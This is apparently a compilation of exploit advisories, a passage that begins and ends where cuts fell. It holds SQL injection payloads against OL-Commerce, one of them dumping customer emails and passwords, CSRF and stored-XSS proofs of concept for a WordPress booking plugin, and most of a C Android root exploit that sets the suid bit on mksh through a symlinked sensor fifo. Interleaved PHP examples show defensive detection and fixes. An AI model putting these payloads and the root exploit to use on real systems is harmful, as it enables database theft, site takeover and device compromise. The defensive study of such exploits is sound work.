count(*),concat((select(select
concat(cast(concat(database(),0x3a,version()) as char),0x7e)) from
information_schema.tables limit 0,1),floor(rand(0)*2))x from
information_schema.tables group by x)a) and 1=1-- -
            
source: https://www.securityfocus.com/bid/68719/info
  
http://www.example.com/OL-Commerce/create_account.php

POST /OL-Commerce/create_account.php  HTTP/1.1
Host: www.example.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:26.0) Gecko/20100101
Firefox/26.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://www.example.com/OL-Commerce/create_account.php
Cookie:
Connection: keep-alive
Content-Type: application/x-www-form-urlencoded
Content-Length: 301


action=process&gender=m&firstname=aaaaa&lastname=bbbb
&dob=17.05.1991&email_address=email@hotmail.com
&company=ccc&vat=1234&street_address=dddd&suburb=eeee
&postcode=00961&city=fffff&state=gggggg
&country=118[SQL
INJECTION]&telephone=45345325&fax=234234&password=12121212&confirmation=12121212&x=28&y=4

[NOTE]
------
country=118[SQL INJECTION]=118' and (select 1 from (select
count(*),concat((select(select
concat(cast(concat(database(),0x3a,version()) as char),0x7e)) from
information_schema.tables limit 0,1),floor(rand(0)*2))x from
information_schema.tables group by x)a) and 1=1-- -
            
source: https://www.securityfocus.com/bid/68719/info
 

http://www.example.com/OL-Commerce/affiliate_show_banner.php?ref=1&affiliate_banner_id=1[SQL INJECTION]
            
source: https://www.securityfocus.com/bid/68719/info

http://www.example.com/OL-Commerce/affiliate_signup.php

POST /OL-Commerce/affiliate_signup.php HTTP/1.1
Host: www.example.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:26.0) Gecko/20100101 Firefox/26.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://www.example.com/o/affiliate_signup.php
Cookie:
Connection: keep-alive
Content-Type: application/x-www-form-urlencoded
Content-Length: 629

action=process&a_gender=m&a_firstname=haha&a_lastname=hahasdf&a_dob=457689
&a_email_address=email@hotmail.com&a_company=iiiiii&a_company_taxid=12
&a_payment_check=jjjjjj&a_payment_paypal=email@hotmail.com
&a_payment_bank_name=paypal
&a_payment_bank_branch_number=555555&a_payment_bank_swift_code=444444
&a_payment_bank_account_name=qqqqqq&a_payment_bank_account_number=3333333
&a_street_address=ddddddd&a_suburb=ccccccf&a_postcode=00961&a_city=bbbbbb
&a_country=118[SQL INJECTION]&a_state=aaaaaa&a_telephone=22222222&a_fax=11111111
&a_homepage=http://iphobos.com/blog&a_password=12121212
&a_confirmation=12121212&a_agb=1&x=65&y=3


[NOTE]
------
a_country=118[SQL INJECTION]=118' and 1=2 union all select
group_concat(customers_id,0x3a,customers_email_address,0x3a,customers_password)+from+customers--
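A defender-side complement to the three OL-Commerce requests above (create_account.php, affiliate_signup.php and affiliate_show_banner.php), added here as an example and not part of the advisory or of OL-Commerce: a small PHP inspector that flags the two injection shapes the notes show (the error-based count(*)/floor(rand(0)*2)/GROUP BY trick and the UNION-based extraction) in a form-encoded body before the application handles it. The function names and the three sample bodies are constructed for this example; the two malicious bodies reproduce the payloads from the notes above.

```php
<?php
// Added example, not OL-Commerce code: inspect a form-encoded request body for
// the two injection shapes shown in the notes above before the application
// processes it. Function names are hypothetical; the sample bodies are
// constructed for this example from the PoC notes.

/** Return the names of the indicators that fire on one decoded form value. */
function olc_example_sqli_indicators(string $value): array
{
    // Normalise the way a WAF rule would: lowercase and collapse whitespace.
    // parse_str() has already percent-decoded the value and turned '+' into spaces.
    $v = strtolower(preg_replace('/\s+/', ' ', $value));

    $patterns = [
        // count(*) ... floor(rand(0)*2) ... group by: the duplicate-key error trick
        'error_based_rand_groupby' => '/floor\s*\(\s*rand\s*\(\s*0\s*\)\s*\*\s*2\s*\).*\bgroup by\b/',
        'union_select'             => '/\bunion\s+(all\s+)?select\b/',
        'schema_or_concat_probe'   => '/\binformation_schema\b|\bgroup_concat\s*\(/',
        'quote_then_boolean'       => "/'\s*(and|or)\b/",
        'comment_terminator'       => '/--(\s|$)/',
    ];

    $hits = [];
    foreach ($patterns as $name => $re) {
        if (preg_match($re, $v) === 1) {
            $hits[] = $name;
        }
    }
    return $hits;
}

/** Map each suspicious field name to the indicators that fired on it. */
function olc_example_inspect_form_body(string $body): array
{
    parse_str($body, $fields);
    $findings = [];
    foreach ($fields as $name => $value) {
        if (!is_string($value)) {
            continue; // array-valued fields (name[]) are outside this example
        }
        $hits = olc_example_sqli_indicators($value);
        if ($hits !== []) {
            $findings[$name] = $hits;
        }
    }
    return $findings;
}

/** Constructed sample bodies: a benign signup and the two PoC payloads above. */
function olc_example_sample_bodies(): array
{
    return [
        'benign'           => 'action=process&firstname=aaaaa&country=118&telephone=45345325',
        'create_account'   => 'action=process&country=118%27+and+%28select+1+from+%28select+count%28%2A%29%2C'
            . 'concat%28%28select+version%28%29%29%2Cfloor%28rand%280%29%2A2%29%29x+from+'
            . 'information_schema.tables+group+by+x%29a%29+and+1%3D1--+-&telephone=45345325',
        'affiliate_signup' => 'action=process&a_country=118%27+and+1%3D2+union+all+select+group_concat'
            . '%28customers_id%2C0x3a%2Ccustomers_email_address%29+from+customers--&a_state=aaaaaa',
    ];
}

if (PHP_SAPI === 'cli') {
    foreach (olc_example_sample_bodies() as $label => $body) {
        $findings = olc_example_inspect_form_body($body);
        printf("%-17s %s\n", $label, $findings === [] ? 'clean' : json_encode($findings));
    }
}
```

Only the field names and indicator names are reported, so the alert stays small and the raw payload can go to a separate audit record. A pattern list like this catches the shapes the advisory documents, not every injection, so it belongs in front of the real fix (parameterised queries for the `country`, `a_country` and `affiliate_banner_id` values), not in place of it.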
            
# Exploit Title: WordPress appointment-booking-calendar <=1.1.24 - SQL injection through ´addslashes´ (wordpress ´wp_magic_quotes´ function)
# Date: 2016-01-28
# Google Dork: Index of /wordpress/wp-content/plugins/appointment-booking-calendar/
# Exploit Author: Joaquin Ramirez Martinez [now i0 security-lab]
# Software Link: http://wordpress.dwbooster.com/calendars/booking-calendar-contact-form
# Vendor: CodePeople.net
# Vendor URI: http://codepeople.net
# Version: 1.1.24
# OWASP Top10: A1-Injection
# Tested on: windows 10 + firefox + sqlmap 1.0.

===================
PRODUCT DESCRIPTION
===================
"Appointment Booking Calendar is a plugin for **accepting online bookings** from a set of **available time-slots in 
a calendar**. The booking form is linked to a **PayPal** payment process.

You can use it to accept bookings for medical consultation, classrooms, events, transportation and other activities
where a specific time from a defined set must be selected, allowing you to define the maximum number of bookings 
that can be accepted for each time-slot."

(copy of readme file)


======================
EXPLOITATION TECHNIQUE
======================
remote

==============
SEVERITY LEVEL
==============

critical

================================
TECHNICAL DETAILS && DESCRIPTION
================================

A SQL injection flaw was discovered within the latest WordPress appointment-booking-calendar plugin version 1.1.24.

The flaw was found in the function that is executed when the action ´cpabc_appointments_calendar_update´ is called.
The action is hooked on the ´init´ tag, so the function is called every time the parameter
´action=cpabc_appointments_calendar_update´ appears in the query string (GET request) or in a POST request.

To exploit this vulnerability successfully we need a vulnerable WordPress site with a special character set in order to bypass
the ´addslashes´ function (called automatically and applied to all $_POST and $_GET variables by the WordPress ´wp_magic_quotes´
function), and we also need to own a calendar (which could be obtained by privilege escalation) or be a user with the ´edit_pages´ permission (admin|editor).

The security risk of SQL injection vulnerabilities is extremely high because, by using this type of flaw, an attacker
can compromise the entire web server.

================
PROOF OF CONCEPT
================

An unauthenticated attacker can make a request like...

http://<wp-host>/<wp-path>/wp-admin/admin-ajax.php?action=cpabc_appointments_check_posted_data
&cpabc_calendar_update=1&id=<owned calendar id>

Example:

	Exploiting simple SQL injection:

	http://localhost/wordpress/wp-admin/admin-ajax.php?action=cpabc_appointments_calendar_update
	&cpabc_calendar_update=1&id=1
	
	Post data:
	specialDates=&workingDates&restrictedDates&timeWorkingDates0&timeWorkingDates1&timeWorkingDates2
	&timeWorkingDates3&timeWorkingDates4&timeWorkingDates5&timeWorkingDates6

All post variables are vulnerable to SQLi with ´addslashes´ bypass.

===============
VULNERABLE CODE
===============

located in ´cpabc_appointments.php´

function cpabc_appointments_calendar_update() {
    global $wpdb, $user_ID;

	if ( ! isset( $_GET['cpabc_calendar_update'] ) || $_GET['cpabc_calendar_update'] != '1' )
		return;

    $calid = intval(str_replace  (CPABC_TDEAPP_CAL_PREFIX, "",$_GET["id"]));
    if ( ! current_user_can('edit_pages') && !cpabc_appointments_user_access_to($calid) )
        return;
echo "sa";
    cpabc_appointments_add_field_verify(CPABC_TDEAPP_CONFIG, 'specialDates');

    //@ob_clean();
    header("Cache-Control: no-store, no-cache, must-revalidate");
    header("Pragma: no-cache");
    if ( $user_ID )    
        $wpdb->query("update  ".CPABC_TDEAPP_CONFIG." set specialDates='".$_POST["specialDates"]."',".CPABC_TDEAPP_CONFIG_WORKINGDATES."='"
		.$_POST["workingDates"]."',".CPABC_TDEAPP_CONFIG_RESTRICTEDDATES."='".$_POST["restrictedDates"]."',".CPABC_TDEAPP_CONFIG_TIMEWORKINGDATES0.
		"='".$_POST["timeWorkingDates0"]."',".CPABC_TDEAPP_CONFIG_TIMEWORKINGDATES1."='".$_POST["timeWorkingDates1"]."',".
		CPABC_TDEAPP_CONFIG_TIMEWORKINGDATES2."='".$_POST["timeWorkingDates2"]."',".CPABC_TDEAPP_CONFIG_TIMEWORKINGDATES3."='"
		.$_POST["timeWorkingDates3"]."',".CPABC_TDEAPP_CONFIG_TIMEWORKINGDATES4."='".$_POST["timeWorkingDates4"]."',"
		.CPABC_TDEAPP_CONFIG_TIMEWORKINGDATES5."='".$_POST["timeWorkingDates5"]."',".CPABC_TDEAPP_CONFIG_TIMEWORKINGDATES6
		."='".$_POST["timeWorkingDates6"]."'  where ".CPABC_TDEAPP_CONFIG_ID."=".$calid);

    exit();
}


===========


Note:
The cpabc_appointments_calendar_update2() function is vulnerable too, to the same exploit explained here.
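How the same update looks with the plugin's own WordPress APIs used safely, added here as an example (it is not the plugin's code and not the vendor's 1.1.25 fix): every POST value goes through $wpdb->prepare(), which escapes with the database connection's charset through the MySQL driver rather than with the byte-oriented addslashes() the description above reports as bypassable, and the calendar id is bound with %d. The CPABC_* constants and the two access checks are the plugin's own as shown in the vulnerable function; the function name is hypothetical.

```php
<?php
// Added example, not the plugin's code and not the vendor's 1.1.25 fix: the same
// UPDATE written so that every POST value is escaped by $wpdb->prepare() and the
// calendar id is bound with %d. The CPABC_* constants and the access checks are
// the plugin's own (see the vulnerable function above); the function name is
// hypothetical. cpabc_appointments_calendar_update2() takes the same rewrite.
function i0_example_calendar_update_hardened() {
    global $wpdb, $user_ID;

    if ( ! isset( $_GET['cpabc_calendar_update'] ) || $_GET['cpabc_calendar_update'] !== '1' ) {
        return;
    }

    $calid = intval( str_replace( CPABC_TDEAPP_CAL_PREFIX, '', $_GET['id'] ) );
    if ( ! current_user_can( 'edit_pages' ) && ! cpabc_appointments_user_access_to( $calid ) ) {
        return;
    }
    if ( ! $user_ID ) {
        return;
    }

    // Column => POST key. The column names are the plugin's constants (trusted
    // code, not request data); only the POST values are attacker-controlled.
    $columns = array(
        'specialDates'                        => 'specialDates',
        CPABC_TDEAPP_CONFIG_WORKINGDATES      => 'workingDates',
        CPABC_TDEAPP_CONFIG_RESTRICTEDDATES   => 'restrictedDates',
        CPABC_TDEAPP_CONFIG_TIMEWORKINGDATES0 => 'timeWorkingDates0',
        CPABC_TDEAPP_CONFIG_TIMEWORKINGDATES1 => 'timeWorkingDates1',
        CPABC_TDEAPP_CONFIG_TIMEWORKINGDATES2 => 'timeWorkingDates2',
        CPABC_TDEAPP_CONFIG_TIMEWORKINGDATES3 => 'timeWorkingDates3',
        CPABC_TDEAPP_CONFIG_TIMEWORKINGDATES4 => 'timeWorkingDates4',
        CPABC_TDEAPP_CONFIG_TIMEWORKINGDATES5 => 'timeWorkingDates5',
        CPABC_TDEAPP_CONFIG_TIMEWORKINGDATES6 => 'timeWorkingDates6',
    );

    $assignments = array();
    $args        = array();
    foreach ( $columns as $column => $post_key ) {
        // wp_unslash() strips the backslashes wp_magic_quotes() added, so the value
        // is escaped exactly once, by prepare(), which uses the connection's charset
        // (mysqli_real_escape_string) instead of the byte-oriented addslashes().
        $raw           = isset( $_POST[ $post_key ] ) && is_string( $_POST[ $post_key ] ) ? $_POST[ $post_key ] : '';
        $assignments[] = '`' . $column . '` = %s';
        $args[]        = wp_unslash( $raw );
    }
    $args[] = $calid; // bound with %d below

    $sql = 'UPDATE `' . CPABC_TDEAPP_CONFIG . '` SET ' . implode( ', ', $assignments )
         . ' WHERE `' . CPABC_TDEAPP_CONFIG_ID . '` = %d';

    header( 'Cache-Control: no-store, no-cache, must-revalidate' );
    header( 'Pragma: no-cache' );
    $wpdb->query( $wpdb->prepare( $sql, $args ) );
    exit();
}
```

wp_unslash() is the matching half of the change: wp_magic_quotes() has already added slashes to $_POST, so passing the values straight to prepare() would double-escape them, and stripping them first makes prepare() the single point of escaping. prepare() is still client-side escaping rather than a server-side bound parameter, but because it goes through the driver with the connection charset set, a multibyte lead byte cannot swallow the backslash the way it can with addslashes().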


==========
 CREDITS
==========

Vulnerability discovered by:
	Joaquin Ramirez Martinez [i0 security-lab]
	strparser[at]gmail[dot]com
	https://www.facebook.com/I0-security-lab-524954460988147/
	https://www.youtube.com/channel/UCe1Ex2Y0wD71I_cet-Wsu7Q


========
TIMELINE
========

2016-01-08 vulnerability discovered
2016-01-24 reported to vendor
2016-01-27 released plugin version 1.1.25
2016-01-28 public disclosure
            
# Exploit Title: WordPress appointment-booking-calendar <=1.1.24 - Privilege escalation (Managing calendars) & Persistent XSS
# Date: 2016-01-28
# Google Dork: Index of /wordpress/wp-content/plugins/appointment-booking-calendar/
# Exploit Author: Joaquin Ramirez Martinez [ i0 security-lab]
# Software Link: http://wordpress.dwbooster.com/calendars/booking-calendar-contact-form
# Vendor: CodePeople.net
# Vendor URI: http://codepeople.net
# Version: 1.1.24
# Tested on: windows 10 + firefox + sqlmap 1.0.

===================
PRODUCT DESCRIPTION
===================
"Appointment Booking Calendar is a plugin for **accepting online bookings** from a set of **available time-slots in 
a calendar**. The booking form is linked to a **PayPal** payment process.

You can use it to accept bookings for medical consultation, classrooms, events, transportation and other activities
where a specific time from a defined set must be selected, allowing you to define the maximum number of bookings 
that can be accepted for each time-slot."

(copy of readme file)


======================
EXPLOITATION TECHNIQUE
======================
remote

==============
SEVERITY LEVEL
==============

medium

================================
TECHNICAL DETAILS && DESCRIPTION
================================

Multiple privilege escalation flaws were found in the appointment-booking-calendar plugin that allow remote low-level
and unauthenticated users to update calendar owners and options (allowing persistent XSS).

================
PROOF OF CONCEPT
================

Changing the charset of all appointment tables to UTF-8, injecting persistent XSS into the ´ict´ and ´ics´ options, and setting
the ´CPABC_APPOINTMENTS_LOAD_SCRIPTS´ option to the value ´1´:

<html>
  <!-- CSRF PoC - generated by Burp Suite i0 SecLab plugin -->
<body>
    <script>
      function submitRequest()
      {
        var xhr = new XMLHttpRequest();
        xhr.open("GET", "http://localhost:80/wordpress/wp-admin/admin.php?page=cpabc_appointments&ac=st&chs=UTF-8&ict=%22%3E%3Cimg+src%3Dx+onerror%3Dalert%281%29%3E&ics=%22%3E%3Cimg+src%3Dx+onerror%3Dalert%281%29%3E&scr=1", true);
        xhr.send();
      }
    </script>
    <form action="#">
      <input type="button" value="Submit request" onclick="submitRequest();" />
    </form>
  </body>
</html>


Updating the calendar with id 1 and setting its name to a persistent XSS payload (if the shortcode [CPABC_APPOINTMENT_CALENDAR calendar="1"]
is added to a post, the injected XSS will appear there; it appears in the administration page too):

<html>
  <!-- CSRF PoC - generated by Burp Suite i0 SecLab plugin -->
<body>
    <script>
      function submitRequest()
      {
        var xhr = new XMLHttpRequest();
        xhr.open("GET", "http://localhost:80/wordpress/wp-admin/admin.php?page=cpabc_appointments&u=1&owner=5&name=%3C%2Foption%3E%3C%2Fselect%3E%3Cimg+src%3Dx+onerror%3Dalert%28%2Fjoaquin%2F%29%3E%3C", true);
        xhr.send();
      }
    </script>
    <form action="#">
      <input type="button" value="Submit request" onclick="submitRequest();" />
    </form>
  </body>
</html>
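Added example of the controls whose absence the two PoCs above exploit (this is not the plugin's code): a capability check so that low-level and anonymous users cannot reach the update, a nonce so that a cross-site GET cannot trigger it, input validation on the owner and charset values, and escaping of the calendar name where it is printed. The plugin's real parameter handling, option keys and table name are not shown on this page, so the function names, the nonce action 'cpabc_update_calendar', the option keys, the charset allow-list and the table name are assumptions.

```php
<?php
// Added example, not the plugin's code: a hypothetical replacement for the
// admin.php?page=cpabc_appointments handler that the two PoCs above target.
// Function names, the nonce action, option keys, the charset allow-list and
// the table name are assumed.
function i0_example_handle_calendar_admin_request() {
    global $wpdb;

    // 1. Authorisation: the PoCs work because low-level and unauthenticated
    //    users reach this code path; require an administrator capability.
    if ( ! current_user_can( 'manage_options' ) ) {
        wp_die( 'Insufficient permissions', '', array( 'response' => 403 ) );
    }

    // 2. Cross-site request forgery: both PoCs are plain cross-origin GETs.
    //    Accept POST only, and only with a nonce issued to this user for this
    //    action (check_admin_referer() dies on a missing or invalid nonce).
    if ( 'POST' !== $_SERVER['REQUEST_METHOD'] ) {
        return;
    }
    check_admin_referer( 'cpabc_update_calendar', 'cpabc_nonce' );

    // 3. Calendar owner/name update (the u/owner/name parameters of the second PoC).
    if ( isset( $_POST['u'], $_POST['owner'], $_POST['name'] ) ) {
        $calendar_id = absint( $_POST['u'] );
        $owner_id    = absint( $_POST['owner'] );
        if ( ! get_userdata( $owner_id ) ) {
            wp_die( 'Unknown owner', '', array( 'response' => 400 ) );
        }
        // Stored as plain text: tags are stripped before the value reaches the DB.
        $name = sanitize_text_field( wp_unslash( $_POST['name'] ) );

        $wpdb->update(
            $wpdb->prefix . 'cpabc_appointments_calendars', // assumed table name
            array( 'owner' => $owner_id, 'name' => $name ),
            array( 'id' => $calendar_id ),
            array( '%d', '%s' ),
            array( '%d' )
        );
    }

    // 4. Settings update (the chs/ict/ics/scr parameters of the first PoC):
    //    validate each value against what the option may legitimately hold.
    if ( isset( $_POST['ac'] ) && 'st' === $_POST['ac'] ) {
        $allowed_charsets = array( 'UTF-8', 'ISO-8859-1' ); // assumed allow-list
        if ( isset( $_POST['chs'] ) && in_array( $_POST['chs'], $allowed_charsets, true ) ) {
            update_option( 'cpabc_charset', $_POST['chs'] ); // assumed option key
        }
        foreach ( array( 'ict', 'ics' ) as $key ) {
            if ( isset( $_POST[ $key ] ) && is_string( $_POST[ $key ] ) ) {
                update_option( 'cpabc_' . $key, sanitize_text_field( wp_unslash( $_POST[ $key ] ) ) );
            }
        }
        update_option( 'CPABC_APPOINTMENTS_LOAD_SCRIPTS', empty( $_POST['scr'] ) ? '0' : '1' );
    }
}

// The form that posts to the handler carries the matching nonce field.
function i0_example_render_calendar_form_fields() {
    wp_nonce_field( 'cpabc_update_calendar', 'cpabc_nonce' );
}

// Output side: the calendar name is escaped for the context it is printed in.
// The second PoC's payload closes </option></select>; esc_html() turns its
// angle brackets into entities so it renders as text, in the admin page and
// wherever the [CPABC_APPOINTMENT_CALENDAR calendar="1"] shortcode prints it.
function i0_example_render_calendar_option( $id, $name, $selected_id ) {
    return sprintf(
        '<option value="%d"%s>%s</option>',
        absint( $id ),
        selected( $id, $selected_id, false ),
        esc_html( $name )
    );
}
```

Storing a sanitized name is defence in depth; the control that actually stops the stored XSS is escaping at the point of output, because the same value may later be printed in contexts sanitize_text_field() was never meant for (attributes, JavaScript), each of which needs its own WordPress escaper (esc_attr(), esc_js()).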

==========
 CREDITS
==========

Vulnerability discovered by:
	Joaquin Ramirez Martinez [i0 security-lab]
	joaquin.ramirez.mtz.lab[at]yandex[dot]com
	https://www.facebook.com/I0-security-lab-524954460988147/
	https://www.youtube.com/user/strparser_lk


========
TIMELINE
========

2016-01-08 vulnerability discovered
2016-01-24 reported to vendor
            
/*
 * Android sensord 0day root exploit by s0m3b0dy
 * tested on LG L7 (PL)
 *
 *
 * need pentests? s0m3b0dy1(at)gmail.com
 *
 * * * * * * * * * * * * * * * * * * * * * * * *
 *
 * some Android devices have a sensord daemon,
 * for some ROMs the daemon is running as a root process (there we can use this exploit)
 *
 * and
 *---------
 * root@android:/ # strace sensord
 * ...
 * open("/data/misc/sensor/fifo_cmd", O_RDWR|O_LARGEFILE) = 12
 * ...
 * open("/data/misc/sensor/fifo_dat", O_RDWR|O_LARGEFILE) = 13
 * fchmod(12, 0666)                        = 0
 * fchmod(13, 0666)                        = 0
 * ---------
 * there is no check that the files are not links, so we can link it to eg. a block device and make it rw!
 * exploit will set bit suid on /system/bin/mksh, need to reboot the device after step 1 and step 2
 *
 * this exploit is dangerous, before step 1 exploit is disabling auto-rotate to not overwrite /system partition!
 *
 * the author is not responsible for any damage
 * for education purpose only :)
 *
 */


#include <stdio.h>
#include <stdlib.h>
#include <string.h>      /* memset, strstr, strncpy */
#include <stdbool.h>     /* bool */
#include <stddef.h>      /* offsetof, used by the EXT4_S_ERR_* macros below */
#include <fcntl.h>
#include <unistd.h>
#include <sys/stat.h>
#include <sys/mman.h>
#include <dirent.h>
#include <ctype.h>
#include <linux/types.h> /* __le16/__le32/__le64/__u8/__u16/__u32 used by the ext4 structs */


#define FIFO_DAT "/data/misc/sensor/fifo_dat"
#define SH "/system/bin/mksh"

struct ext4_super_block {
 /*00*/  __le32  s_inodes_count;
         __le32  s_blocks_count_lo;
         __le32  s_r_blocks_count_lo;
         __le32  s_free_blocks_count_lo;
 /*10*/  __le32  s_free_inodes_count;
         __le32  s_first_data_block;
         __le32  s_log_block_size;
         __le32  s_log_cluster_size;
 /*20*/  __le32  s_blocks_per_group;
         __le32  s_clusters_per_group;
         __le32  s_inodes_per_group;
         __le32  s_mtime;
 /*30*/  __le32  s_wtime;
         __le16  s_mnt_count;
         __le16  s_max_mnt_count;
         __le16  s_magic;
         __le16  s_state;
         __le16  s_errors;
         __le16  s_minor_rev_level;
 /*40*/  __le32  s_lastcheck;
         __le32  s_checkinterval;
         __le32  s_creator_os;
         __le32  s_rev_level;
 /*50*/  __le16  s_def_resuid;
         __le16  s_def_resgid;
         __le32  s_first_ino;
         __le16  s_inode_size;
         __le16  s_block_group_nr;
         __le32  s_feature_compat;
 /*60*/  __le32  s_feature_incompat;
         __le32  s_feature_ro_compat;
 /*68*/  __u8    s_uuid[16];
 /*78*/  char    s_volume_name[16];
 /*88*/  char    s_last_mounted[64];
 /*C8*/  __le32  s_algorithm_usage_bitmap;
         __u8    s_prealloc_blocks;
         __u8    s_prealloc_dir_blocks;
         __le16  s_reserved_gdt_blocks;
 /*D0*/  __u8    s_journal_uuid[16];
 /*E0*/  __le32  s_journal_inum;
         __le32  s_journal_dev;
         __le32  s_last_orphan;
         __le32  s_hash_seed[4];
         __u8    s_def_hash_version;
         __u8    s_jnl_backup_type;
         __le16  s_desc_size;
 /*100*/ __le32  s_default_mount_opts;
         __le32  s_first_meta_bg;
         __le32  s_mkfs_time;
         __le32  s_jnl_blocks[17];
 /*150*/ __le32  s_blocks_count_hi;
         __le32  s_r_blocks_count_hi;
         __le32  s_free_blocks_count_hi;
         __le16  s_min_extra_isize;
         __le16  s_want_extra_isize;
         __le32  s_flags;
         __le16  s_raid_stride;
         __le16  s_mmp_update_interval;
         __le64  s_mmp_block;
         __le32  s_raid_stripe_width;
         __u8    s_log_groups_per_flex;
         __u8    s_checksum_type;
         __u8    s_encryption_level;
         __u8    s_reserved_pad;
         __le64  s_kbytes_written;
         __le32  s_snapshot_inum;
         __le32  s_snapshot_id;
         __le64  s_snapshot_r_blocks_count;
         __le32  s_snapshot_list;
 #define EXT4_S_ERR_START offsetof(struct ext4_super_block, s_error_count)
         __le32  s_error_count;
         __le32  s_first_error_time;
         __le32  s_first_error_ino;
         __le64  s_first_error_block;
         __u8    s_first_error_func[32];
         __le32  s_first_error_line;
         __le32  s_last_error_time;
         __le32  s_last_error_ino;
         __le32  s_last_error_line;
         __le64  s_last_error_block;
         __u8    s_last_error_func[32];
 #define EXT4_S_ERR_END offsetof(struct ext4_super_block, s_mount_opts)
         __u8    s_mount_opts[64];
         __le32  s_usr_quota_inum;
         __le32  s_grp_quota_inum;
         __le32  s_overhead_clusters;
         __le32  s_backup_bgs[2];
         __u8    s_encrypt_algos[4];
         __u8    s_encrypt_pw_salt[16];
         __le32  s_lpf_ino;
         __le32  s_prj_quota_inum;
         __le32  s_checksum_seed;
         __le32  s_reserved[98];
        __le32  s_checksum;
};

struct ext4_group_desc
{
         __le32  bg_block_bitmap_lo;
         __le32  bg_inode_bitmap_lo;
         __le32  bg_inode_table_lo;
         __le16  bg_free_blocks_count_lo;
         __le16  bg_free_inodes_count_lo;
         __le16  bg_used_dirs_count_lo;
         __le16  bg_flags;
         __le32  bg_exclude_bitmap_lo;
         __le16  bg_block_bitmap_csum_lo;
         __le16  bg_inode_bitmap_csum_lo;
         __le16  bg_itable_unused_lo;
         __le16  bg_checksum;
         __le32  bg_block_bitmap_hi;
         __le32  bg_inode_bitmap_hi;
         __le32  bg_inode_table_hi;
         __le16  bg_free_blocks_count_hi;
         __le16  bg_free_inodes_count_hi;
         __le16  bg_used_dirs_count_hi;
         __le16  bg_itable_unused_hi;
         __le32  bg_exclude_bitmap_hi;
         __le16  bg_block_bitmap_csum_hi;
         __le16  bg_inode_bitmap_csum_hi;
         __u32   bg_reserved;
 };

struct ext4_inode {
         __le16  i_mode;
         __le16  i_uid;
         __le32  i_size_lo;
         __le32  i_atime;
         __le32  i_ctime;
         __le32  i_mtime;
         __le32  i_dtime;
         __le16  i_gid;
         __le16  i_links_count;
         __le32  i_blocks_lo;
         __le32  i_flags;
         union {
                 struct {
                         __le32  l_i_version;
                 } linux1;
                 struct {
                         __u32  h_i_translator;
                 } hurd1;
                 struct {
                         __u32  m_i_reserved1;
                 } masix1;
         } osd1;
         __le32  i_block[15];
         __le32  i_generation;
         __le32  i_file_acl_lo;
         __le32  i_size_high;
         __le32  i_obso_faddr;
         union {
                 struct {
                         __le16  l_i_blocks_high;
                         __le16  l_i_file_acl_high;
                         __le16  l_i_uid_high;
                         __le16  l_i_gid_high;
                         __le16  l_i_checksum_lo;
                         __le16  l_i_reserved;
                 } linux2;
                 struct {
                         __le16  h_i_reserved1;
                         __u16   h_i_mode_high;
                         __u16   h_i_uid_high;
                         __u16   h_i_gid_high;
                         __u32   h_i_author;
                 } hurd2;
                 struct {
                         __le16  h_i_reserved1;
                         __le16  m_i_file_acl_high;
                         __u32   m_i_reserved2[2];
                 } masix2;
         } osd2;
         __le16  i_extra_isize;
         __le16  i_checksum_hi;
         __le32  i_ctime_extra;
         __le32  i_mtime_extra;
         __le32  i_atime_extra;
         __le32  i_crtime;
         __le32  i_crtime_extra;
         __le32  i_version_hi;
 };

void print_usage( char ** argv)
{
    printf("Have 3 steps. You need to reboot the device after step 1 and step 2.\n");
    printf("Usage: %s 1\n", argv[0]);
    printf("       %s 2\n", argv[0]);
    printf("       %s 3\n", argv[0]);
    printf("       %s verify\n", argv[0]);
}

void get_system_dev( char *ptr, int size )
{
    int fd = open("/proc/mounts", O_RDONLY);
    int pos = 0, posend = 0, tmppos = 0;
    char buff[4096];
    char link[1024];
    memset(buff, 0, sizeof(buff));
    memset(link, 0, sizeof(link));
    memset(ptr, 0, size);
    if(fd != -1)
    {
        read(fd, buff, sizeof(buff) - 1);           /* leave room for the NUL terminator */
        char *sres = strstr(buff, " /system ");     /* strstr() returns a pointer, NULL on miss */
        if( (sres != NULL) && ((pos = (int)(sres - buff)) > 0) )
        {
            tmppos = pos;
            /* walk back to the start of the mount line to get the device path */
            while( (buff[pos] != '\n') && (pos > 0) ) pos--;
            if( buff[pos] == '\n' ) pos++;
            strncpy(link, &buff[pos], tmppos - pos);
            /* by-name entries are symlinks; resolve them, else keep the path as-is */
            if( readlink(link, ptr, size - 1) == -1 )
                strncpy(ptr, link, size - 1);

        }
        else
        {
            printf("[-] Can't find system partition!\n");
            close(fd);
            exit(0);
        }
        close(fd);
    }
    else
    {
        printf("[-] Can't read /proc/mounts file!\n");
        exit(0);
    }

}

void first_step()
{
    if( access(FIFO_DAT, F_OK) != -1 )
    {
        unlink(FIFO_DAT);
    }


    char path[1024];
    get_system_dev(path, sizeof(path));
    symlink(path, FIFO_DAT);

    printf("[+] Symlink is created, please reboot device and run second step.\n[+] The device may slow down, after second step will work normally.\n");
}

void second_step()
{
    char path[1024];
    struct stat s;

    unlink(FIFO_DAT);

    stat(SH, &s);
    printf("[+] Looking for inode no.: %llu\n", (unsigned long long)s.st_ino);

    get_system_dev(path, sizeof(path));

    int fd = open(path, O_RDWR);
    if( fd != -1 )
    {
        int inodeno = s.st_ino;
        struct ext4_super_block super;
        struct ext4_group_desc group_descr;
        struct ext4_inode inode;

        unsigned long int offset=0;
        lseek(fd, 0x400, SEEK_SET);

        read(fd, &super, sizeof(super));

        int block_size = 1024 << super.s_log_block_size;
        int bg = (inodeno-1) /super.s_inodes_per_group;

        lseek(fd, block_size + bg * (super.s_desc_size ? super.s_desc_size : sizeof(struct ext4_group_desc) ), SEEK_SET);
        read(fd, &group_descr, sizeof(group_descr));


        unsigned int index = (inodeno-1) % super.s_inodes_per_group;
        unsigned int off = index *  super.s_inode_size;
        unsigned long total_offset = block_size + (group_descr.bg_inode_table_lo-1) * block_size + off;

        lseek(fd, total_offset, SEEK_SET);
        read(fd, &inode, sizeof(struct ext4_inode));

        if(inode.i_size_lo == s.st_size) {
            __le16 mode = 0;
            printf("[+] Found inode!\n");
            lseek(fd, total_offset, SEEK_SET);

            inode.i_mode = inode.i_mode | 0x800;

            int modesize = sizeof(inode.i_mode);
            int wr = write(fd, &inode.i_mode, modesize);

